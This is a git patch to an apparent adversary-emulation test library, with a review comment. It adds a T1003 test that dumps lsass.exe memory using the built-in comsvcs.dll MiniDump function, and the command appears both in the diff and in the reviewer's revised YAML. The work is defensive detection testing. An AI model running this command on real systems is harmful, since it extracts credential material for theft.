From b23f570d8a5faf963e76f312c821b027bbd2b141 Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Mon, 30 Mar 2020 12:56:59 -0600
Subject: [PATCH] added Dump LSASS.exe Memory using comsvcs.dll to T1003 (#912)
* added Dump LSASS.exe Memory using comsvcs.dll
* Updated filemod path
* Re-fixed path.
Co-authored-by: Michael Haag
---
 atomics/T1003/T1003.yaml | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index ec50e216..918714c7 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -153,7 +153,7 @@ atomic_tests:
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump.
- Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
+ Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
 If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
 supported_platforms:
@@ -189,6 +189,24 @@ atomic_tests:
 cleanup_command: |
 del "#{output_file}" >nul 2> nul
+- name: Dump LSASS.exe Memory using comsvcs.dll
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
+
+ supported_platforms:
+ - windows
+
+ executor:
+ elevation_required: true
+ name: powershell
+ command: |
+ C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
+ cleanup_command: |
+ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
+
+
 - name: Dump LSASS.exe Memory using Windows Task Manager
 description: |
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
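Review bot: The new test hard-codes the dump path `$env:TEMP\lsass-comsvcs.dmp` three times (description, `command`, `cleanup_command`), whereas the preceding test in this file parameterizes it, as the context line `del "#{output_file}"` shows. Declaring an `input_arguments` entry `output_file` with that path as its `default` and referencing `#{output_file}` in both executor lines keeps the copies from drifting and lets whoever validates file-creation telemetry direct the artifact to a monitored location without editing the command. The `comsvcs.dll` path is written `C:\windows\System32` while `rundll32.exe` uses `C:\Windows\System32`; matching the casing is cosmetic on Windows but reads cleaner. The entry also ends with two blank `+` lines, which looks like one more than the separation used elsewhere, though that is not visible from this hunk.
```yaml
- name: Dump LSASS.exe Memory using comsvcs.dll
  # … unchanged: description, supported_platforms …
  input_arguments:
    output_file:
      description: Path the minidump is written to; also removed by cleanup_command
      type: Path
      default: $env:TEMP\lsass-comsvcs.dmp
  executor:
    # … unchanged: elevation_required, name …
    command: |
      C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id #{output_file} full
    cleanup_command: |
      Remove-Item #{output_file} -ErrorAction Ignore
```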